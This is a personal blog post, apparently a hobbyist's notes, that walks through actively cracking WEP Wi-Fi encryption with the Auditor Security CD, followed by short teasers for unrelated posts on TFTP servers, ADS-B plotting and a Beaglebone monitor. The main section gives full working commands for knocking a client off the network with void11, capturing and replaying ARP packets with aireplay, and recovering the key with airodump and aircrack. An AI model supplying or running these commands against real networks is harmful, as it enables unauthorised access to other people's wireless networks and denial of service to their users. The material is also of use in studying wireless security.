Skip to main content

WEP Cracking with Auditor CD

Since I can't find all of my instructions due to a crappy 16GB DataStickSport Thumbdrive crash, I heavily used this site for reference

There are two ways of cracking WEP.  The totally passive way, which is to just listen and gather enough weak IVs to crack the key (long and boring), or the active way, which requires two wireless cards (one to transmit traffic to generate the weak IVs, and the other to receive the weak IVs).   

I'll walk through the active way, as the passive simply requires Aerodumping the packets with the Aerodump scripts below in one terminal, and Aircracking them with the Aircrack scripts below in a separate window (can be done at same time).  I'm tailoring these scripts for the Security Auditor CD on two different boxes, as this is often more convienient than installing the tools on a production box, or dealing with fighting cards.  

First, conduct a scan of your network:  Kismet works wonders for this. 

you should have written down the following four pieces of information:
  • MAC Address of the wireless Access Point (AP)
  • MAC Address of the "Target" computer
  • BSSID of the AP
  • Wi-Fi channel used
Next, to generate enough traffic to crack a key, the best way is to replay an ARP association packet (much faster than sending bogus large pings or something).  So you'll need to capture an ARP packet of a client on the network associating.  You can set there and wait for someone to associate, or you can kick someone off the network and catch the association packet.  Let's do the latter.

Start up Aireplay to capture an ARP packet and replay it:
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff
#my Netgear
#aireplay -i wlan0 -b 00:09:5b:3e:39:96 -t 1 -f 0 -d ff:ff:ff:ff:ff:ff
Use Void11 to knock off your client:
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0
#void11_penetration -D -s 00:0f:3d:a9:0e:b4 -B 00:13:10:0e:e4:4b -m 50 wlan0
Aireplay will prompt you to replay a packet.  Replay the captured packet if it matches the following criteria:
  • FromDS - 0
  • ToDS - 1
  • BSSID - MAC Address of the Target AP
  • Source MAC - MAC Address of the Target computer
  • Destination MAC - FF:FF:FF:FF:FF:FF
Don't forget to Stop your deauthentication with VOID11 at this point.

Now you have one machine generating lots of traffic.  Go to your other machine(or other card) to capture those packets and break them.

Start Aerodump to capture the network traffic:
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1

After Aerodump starts, you should now see the IV count rise to about 200 per second,

Start Aircrack, and wait for your key to pop out:
cd /ramdisk
#My Netgear
#aircrack -f 2 -m 00:0c:41:f6:33:27 -n 128 -q 3 cap*.cap


Popular posts from this blog

atftpd vs tftpd-hpa

Recently I was trying to tftp files from a Windows computer to a Kali box.   One version of Windows worked, but another didn't.    After much troubleshooting, here were my symptoms:

I could tftp a file from-to any Kali box from-to another Kali box
I could NOT tftp files to a specific Windows 7 box from any Kali box
I could NOT tftp files to a Chrooted-Ubuntu-Chromebook box from a Kali box

After MUCH troubleshooting, going through every setting in atftpd, it seemed like it literally was a client OS problem.  Different clients simply would not download files---unacceptable.

Thus, I switched to tftpd-hpa.   To install:
apt-get install tftpd-hpa

files go to/come from /srv/tftp, but it needs to be a tftp user. Thus, I needed to:
chroot -R /srv/tftp

Also, if you want to be able to put files ON the tftp server (from a client), you need to modify /etc/default/tftpd-hpa:
change "TFTP_OPTIONS="--secure" to "TFTP_OPTIONS="--secure --create"

I also changed the IP li…

ADS-B plotting with Kali (and other SDR goodies)

Recently I wanted to try some Software Defined Radio stuff.   
I had a RTL-SDR, FM+DAB, DVB-T USB Stick Set with RTL2832U & R820T. that I got from:
But, even though this dongle would break out FM radio stations, and ATC frequencies (like the local Ground Control, tower, and even ATIS), which was cool, it wouldn't break out ADS-B.   
Thus, I bought a Vantech Green Mini RTL2832U R820T DVB-T SDR DAB FM USB DIGITAL TV Tuner Receiver RTL-SDR Project + DAB dongle Tuner MCX Input from Amazon, and tried this.  
This dongle was able to listen to the 1090MHz frequency required for ADS-B (as it goes from 25MHz to 1700MHz).  There were tons of Windows programs out there for breaking out and plotting ADS-B Mode S broadcasts, but not many for Linux.  
For Kali Linux, here's how I got it running and plotting planes around my home:
0) before you start, you should do an apt-get update to ensure you hav…

Temper Temperature monitor on a Beaglebone Black

Beaglebone Black as a temperature monitor:

Recently I wanted to monitor the temperature of my shed.  I thought I'd use a small computer such as a Raspberry Pi or a Beaglebone or Odroid.

My Raspberry Pi boxes were all in use, so I grabbed my Beaglebone, which was doing nothing.

I flashed it with the Debian9.32018-03-054GB SDIoTimage, but that seemed like it was running lots of bloatware and the ethernet interface wouldn't take a static IP with /etc/network/interfaces.

So I went with the Debian9.32018-01-284GB SDLXQTi image instead.  I still had the same problem, that lots of junk was running, and I couldn't configure my interface by modifying /etc/network/interfaces

So my first step was to get rid of all the bloatware.  If you're using a Raspberry Pi or something, you can skip this and just go to the second step below

STEP 1--Remove Blotatware from Beaglebone Black:

With some searching, I came across this post:…